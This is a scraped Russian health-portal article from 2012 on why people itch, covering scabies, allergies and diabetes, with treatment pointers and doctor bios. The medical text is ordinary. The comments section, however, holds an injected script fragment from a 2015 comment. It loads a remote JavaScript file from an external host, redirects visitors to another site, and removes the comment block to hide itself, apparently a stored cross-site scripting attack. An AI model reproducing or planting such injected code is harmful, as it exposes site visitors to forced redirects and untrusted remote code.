Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Почему люди чешутся?  >>  Почему люди чешутся?
 
Обратная связь
 

Почему люди чешутся?

Размер шрифта
27 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Симптом у зуда только один: «чешется». А вот причины, вызывающие зуд, разные: от безобидного комариного укуса до серьезного заболевания. Так почему же мы чешемся?

1 

Причина первая – чесотка

Самая банальная и распространенная причина зуда, даже в наше просвещенное время, – чесотка.

1
Чесотка
– заразное кожное заболевание, вызванное микроскопическим чесоточным клещом.

Чесоточный клещ — облигатный паразит, т.е. живет на коже человека, и его жизнедеятельность связана с человеческим телом: он передвигается и спаривается в роговом слое коже, формируя так называемые чесоточные ходы.

Почему чешется?

Зуд при чесотке – это аллергическая реакция IV типа на слюну, яйца, экскременты и хитиновую оболочку клещей.

Интересно: Самцы чесоточного клеща погибают сразу после оплодотворения самок. Это значит, что мучают людей именно клещи-самки.

Чесоткой легко заразиться, если не соблюдать правил гигиены, ведь чесотка – это заболевание, появляющееся вследствие телесного контакта. К тому же, когда человек чешется, на коже остаются следы расчесов, которые могут инфицироваться и воспаляться.

Что делать

  • Показаться врачу-дерматологу. Он назначит серосодержащие или акарицидные препараты (скабициды).
  • Во время лечения чесотки нужно следить за состоянием кожи, чтобы к расчесам не присоединилась инфекция.

Причина вторая – аллергия

Истинная аллергическая реакция возникает в организме человека как ответ на определенные виды антигенов (белков). Когда эти антигены (например, пыльца растения или белок рыбы) попадают в организм, то они становятся аллергенами.

1

Почему чешется?

В организме вырабатываются защитные белки. Они связываются с аллергенами, в результате чего вырабатывается белок гистамин. Именно гистамин стимулирует раздражение нервных окончаний, что и заставляет человека чесаться. Гистамин также привлекает жидкость из кровеносного русла, возникает отек, начинается покраснение из-за прилива крови.

Что делать

  • Убрать аллергены: сложно лечить аллергию, не зная, что ее вызывает.
  • Принять антигистаминный препарат. Эти препараты блокируют выработку гистамина, и вся описанная выше цепь не запускается. Можно подкрепить действие таблеток кремом или мазью.
  • Защищаться от насекомых. Они впрыскивают под кожу слабо действующий яд, который тоже раздражает нервы и вызывает аллергическую реакцию.
  • Избегать прямого контакта со средствами бытовой химии, либо исключить их из своего обихода.

Третья причина – сахарный диабет

Необъяснимый зуд при отсутствии сыпи может возникнуть из-за повышенного уровня сахара в крови.

1

Почему чешется?

Когда в организме нормальное количество сахара, то оно легко преобразуется и выводится.

Если у человека высокий уровень сахара в крови, то увеличивается и количество жидкости в организме, поскольку сахар выводится именно с жидкостью. Это ведет к повышению мочеотделения и чувству жажды. После начинается общее обезвоживание, которое приводит к чрезмерной сухости кожи. В результате – зуд.

При сахарном диабете человек много пьет, однако организму все равно не удается вывести достаточное количество сахара. Инсулина не хватает, и уровень сахара в крови остается повышенным, что тоже приводит к зуду.

Что делать

  • Необходимо следить за уровнем сахара, особенно полным и людям старше 60. В аптеках продаются глюкометры, с помощью которых можно измерять уровень сахара дома.
  • Если у вас сахарный диабет, вы склонны к грибковым инфекциям, которые сами по себе сопровождаются зудом. Следите за своими стопами.
  • Избегайте сухой кожи стоп, поскольку трещины на пятках могут привести к ранам и заражению грибком.
  • Если этот зуд мучительный – ищите причину и вовремя сходите к врачу.

 

Сюжеты по теме:
Почему человек чешется. Разбираем причины этого явления 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.